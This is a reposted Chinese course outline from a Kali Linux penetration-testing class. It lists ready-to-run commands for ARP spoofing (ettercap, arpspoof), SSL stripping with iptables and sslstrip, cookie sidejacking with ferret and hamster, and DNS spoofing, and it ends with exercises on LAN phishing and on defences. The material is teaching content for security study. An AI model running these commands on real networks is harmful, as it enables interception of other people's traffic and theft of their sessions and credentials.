专栏首页玄魂工作室【PPT】Kali Linux Web 渗透测试-arp欺骗、嗅探、dns欺骗、session劫持

【PPT】Kali Linux Web 渗透测试-arp欺骗、嗅探、dns欺骗、session劫持

关于嗅探、arp欺骗、会话劫持

l 1. google

l 2. http://www.cnblogs.com/xuanhun/archive/2009/01/05/1369828.html

l http://www.cnblogs.com/xuanhun/archive/2009/04/22/1441274.html

会话劫持的实现手段

l 中间人攻击(arp欺骗,dns欺骗)

l 注射式攻击

Arp欺骗--ettercap

l 参数说明:http://www.91ri.org/4408.html

l 2.如果你是第一次进行中间人攻击操作,那么要对kali下的ettercap做点配置,配置文件是/etc/ettercap/etter.conf 首先你要将EC_UID 、EC_GID都变为0,然后找到LINUX分类下的IF YOU USE IPTABLES这一行,将注释(“#”号)去掉,打开转发。

3./etc/NetworkManager/NetworkManager.conf 修改

4.service network-manager restart

5.echo 1 >> /proc/sys/net/ipv4/ip_forward

6. ettercap -i wlan0 -Tq -M arp:remote /192.168.2.20/ /192.168.2.1/

Arp欺骗—arpspoof

l echo 1 >> /proc/sys/net/ipv4/ip_forward

l arpspoof -i eth0 -t 192.168.14.2 192.168.14.132

数据包捕获

l tcpdump

l wireshark

l drafnet等其他自动化工具

Ssl数据嗅探

l iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000(设置)

l iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000(取消)

l sslstrip -p -l 10000 -w log.txt

session劫持-arp欺骗

l tcpdump -i eth0 -w qq.cap

l ferret -r qq.cap

l hamster

l http://hamster

l 选择目标

l 测试session

64位下ferret 安装

l dpkg --add-architecture i386

l apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

l sudo aptitude install ferret-sidejack:i386

session劫持-DNS欺骗

l 1. 使用 ettercap 进行arp欺骗

l 2.修改etter.dns 文件

/etc/ettercap/etter.dns

l 3.启用dns_spoof

课后练习

l 结合前面课程中的 set 工具集,我们在局域网中能做到天衣无缝(钓鱼和消息转发相结合)的钓鱼攻击吗?

l 局域网中的嗅探、钓鱼、session劫持、dns欺骗这一类的攻击的防御方式是什么?

本文分享自微信公众号 - 玄魂工作室(xuanhun521)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2018-11-28

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • CVE-2020-14645:Weblogic远程代码执行复现

    WebLogic是美国Oracle公司出品的一个application server,是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署...

    用户1631416
  • Kali Linux Web渗透测试手册(第二版) - 4.3- 使用Hydra对基本身份验证进行暴力破解攻击

    thr0cyte,Gr33k,花花,MrTools,R1ght0us,7089bAt,

    用户1631416
  • 如何学python-第一课 入门简介

    最近在论坛上闲逛的时候,我发现了一些相当不错的python脚本编程的文章。不过,这些文章也有它们的局限性,因为它们更多的是在介绍一些基础的语法,而不是关于无比热...

    用户1631416
  • 泛型程序设计详解(一)

      泛型是C#和.Net的一个重要概念,泛型不仅是C#编程语言中的一部分,而且与程序集中的IL(Intermediate Language)代码紧密的集成。

    小世界的野孩子
  • RESTful源码学习笔记之RPC和 RESTful 什么区别

    REST,即Representational State Transfer的缩写。翻译过来是表现层状态转换。 如果一个架构符合REST原则,就称它为RESTfu...

    Jetpropelledsnake21
  • tomcat 配置好tomcat-user.xml 无法访问

    小贝壳
  • 提升12倍!中国香港浸会大学与MassGrid发布低带宽高效AI训练新算法

    2018年,香港浸会大学异构计算实验室与MassGrid合作,通过研究提出一种可用于低带宽网络的全局Top-k稀疏化的分布式同步SGD算法,并通过实验论证出在低...

    量子位
  • JavaScript ES2019 中的 8 项新功能

    JavaScript 一直在不断改进和添加更多新功能。TC39 已经完成,并批准了 ES2019 的 8 项新功能。这个过程包含了 5 个阶段:

    一墨编程学习
  • 指针数组与指向指针的指针

    http://wlkc.gdqy.edu.cn/jpkc/portal/blob?key=173314

    阳光岛主
  • 源码分析UE4的导航系统(1):场景体素化

    UE4的导航使用的是RecastDetour组件,这是一个开源组件,主要支持3D场景的导航网格导出和寻路,或者有一个更流行的名字叫做NavMesh。不管是Uni...

    阿苏勒

扫码关注云+社区

领取腾讯云代金券